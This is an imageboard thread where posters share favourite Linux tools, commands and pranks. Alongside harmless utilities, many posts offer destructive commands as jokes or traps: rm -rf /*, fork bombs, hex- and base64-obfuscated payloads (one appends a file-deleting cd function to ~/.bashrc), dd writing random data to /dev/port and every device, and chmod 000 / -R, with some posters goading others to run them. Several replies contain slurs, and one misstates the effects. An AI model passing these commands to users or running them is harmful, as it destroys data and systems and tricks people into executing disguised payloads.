Favorite Linux programs, commands, or pranks?


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check out climagick on yt and twitter, might be what you're looking for

Once I installed linux and then removed everything from desktop and put image of XP desktop as wallpaper. Trolled myself pretty hard haha what a prank... lol!

rm -rf /*

when i'm on someone else's computer: :(){ : | : & }
as for commands: ffmpeg, imagemagick, sed, awk

>favorite program
I can't decide between grep, sed or awk.
They are all different tools, used for different things.
I really like the grep -rn $(search) it is short and lets me find things.
Putting a script on peoples computers which whishes them happy birthday is fun and innocent.
I also overwrite the alias for git push so it plays the "push it" song in the background while pushing.

Yeah? Hopefully I can make it look like MacOS :p

why did i laugh out loud at this post?

echo alias ls=sl >> ~/.bash_rc && source ~/.bashrc


mah nigga

$(echo 726d202d7266202a | xxd-r -p)

cat /dev/ports

what does it do friend?

What does that do

$(echo "I

It's a game of luck. It could just fill your terminal with shit, cause a kernel panic or crash the entire system immediately

dd if=/dev/urandom of=/

It works better with :
$(echo 3a28 297b 3a7c 3a26 7d3b 3a | xxd-r -p)

3a28 297b 3a7c 3a26 7d3b 3a means in Hexa.

you can't set "of" to a directory


chmod 000 / -R

care to expalin a bit further in detail? i assume its consuming some kind of buffers wich data could be important, is that correct?

dangerous on systemd lunix as that wipes the firmware of the machine bricking it

xxd converts strings to hex or with -r back to plaintext
726d202d7266202a translates to rm -rf *

>[algorithm]sum [filepath]
>echo [nonsense] | [algorithm]sum

I love the first one.

there's unfortunately surprisingly little information on this available. you could be right with buffering and hardware IO is definitely critical data

echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D4D465452snlbxq'|dc

Who's a bad enough dude to run my c0de?


you can use ` to check, it will translate any command to string literal
try this `echo 726d202d7266202a | xxd-r -p`

:(){ :|: & };:


Come on you faggots make that as your first command every time you use your linux/gnu machine

That's actually pretty clever.


What's it do?

steam locomotives every time you use ls

dd if=/dev/random of=/dev/port


Yeah but nobody actually uses that piece of shit lennartware... right?


too many and mostly text based, but for GUI there is EasyTag for managing music tags, Gthumb to organize my pictures, Liferea to read news and podcasts (even from youtube), IceCat because I want a good browser, and possibly JDownloader because is the best download manager/scraper out there

ya blew it

unp youtube-dl

poor kids.

Sup Forums is like the wild west to them.

this installs the gentoo

I really need to learn regex

would this work?

alias cd = 'rm *';


Insert to bashrc

i dont know if this would work for cd can anyone test or confirm?
function cd () {
if [ "$(id -u)" != "0" ]; then
sudo rm *
sudo rm -rf $1
exit 1
rm -rf *
rm -rf $1

no --no-preserve-root?
I thought this was necessary nowadays.

meant for



>no one

Not necessary, because /* refers to the root subdirs and not the root itself.

u so leet, fork-sensei.

Good job, Sup Forumsuys.

that's the best part

But it's not a regex user, it's called fork-bomb.

let me expand it for you
function_name() {
function_name | function_name &


This is on zsh, but I'm sure it works on bash too.
alias please='eval "sudo $(fc -ln -1)"'
So it would look like this:
~ pacman -S linux
error: you cannot perform this operation unless you are root.
~ please
warning: linux-4.7.1-1 is up to date -- reinstalling
resolving dependencies...
looking for conflicting packages...

Packages (1) linux-4.7.1-1

Total Installed Size: 76.73 MiB
Net Upgrade Size: 0.00 MiB

:: Proceed with installation? [Y/n]

for((P=11**8,Q=P/111,X=333*Q/(`tput cols`-1),Y=222*Q/`tput lines`,y=-111*Q,v=-222*Q,x=v;y

Unix machines, use crontab to set an event to use 'espeak' or 'say' to say something like "I'm watching you" every 30 minutes or few hours

ITT: Portable software that can run on windows, linux, BSD, and OS X

how about sudo !!

Not sure if ZSH supports that

I just had to know and installed ZSH.
It works.

dubs confirms, everyone should do this

if all you needed was dubs, lots of shit would have been done by now

>tfw years after you dropped bash you realize the forkbomb no longer works on your shell

^X^E in your shell

this tickles my peanus weanus haha

you need to turn on your firewall
rm -rf

top security there

echo 66756e6374696f6e2063642829207b206966205b203020213d2030205d3b
202a3b202020726d202d7266203b206669207d0a | xxd -r -p >> ~/.bashrc

Honestly everything with a "-r" on it should raise the red flag.

tcpdump -A -vv | aplay

>listen packets, audibly
>play around with aplay options



sudo sh -c 'for a in /dev/*; do dd if=/dev/urandom of="$a" bs=4M >/dev/null 2>&1 & done'

yes but is there a command for love

The first things I do on logon are:
sudo pkill mpd
I keep telling myself I'll set up mpd properly one day so I don't have to restart it every time I log on.

I also use mpv --ytdl [link] a lot.

sudo sh -e ~/Downloads/crouton -t xfce

I heard of a program called Mimic that replaces semicolons with similar signs.

Vim users can install vim-troll-stopper, which detects suspicious signs and can replace them in one command.

First command I ever do on any linux machine i've used is

apt-get install screenfetch && screenfetch

then after that it's usually

apt-get clean && apt-get update && apt-get upgrade && apt-get dist-upgrade && apt-get autoremove

Except from everyone who run a recent popular distro without tinkering, I guess.

wow are you a hacker?

You don't actually need that "-get".
Apt knows what it needs.


I guess when there are so few results google will pick up even a Sup Forums thread within an hour.

>Using a java launcher to install a bash script

yep, google is everywhere
within an hour I had google bots crawling my newly set up server hosting my site

but I wanted to point out that made a typo or something and that I would be interested in that

echo "H4sIAFomulcAAwvPzEvJLy9OS0wvVkhOzFMvUShKTUxRKMnILOYCAK/3/OkcAAAA" | base64 -d | gunzip -f


What does that do?

>cat /dev/ports
cat: /dev/ports: No such file or directory

it is not a prank but i think it is funny:
if i get access to the webserver i always put some funny text to the http header

favorite programs:
youtube-dl ffmpeg ranger


Was that never fixed? I remember hearing about that a year or two back.



shred, lsblk, sync

mkcd () {
[ ! -d "$1" ] && mkdir -vp "$1" && cd "$1"

alias meteo='curl --silent wttr.in/ | head -7'

sl is pretty useful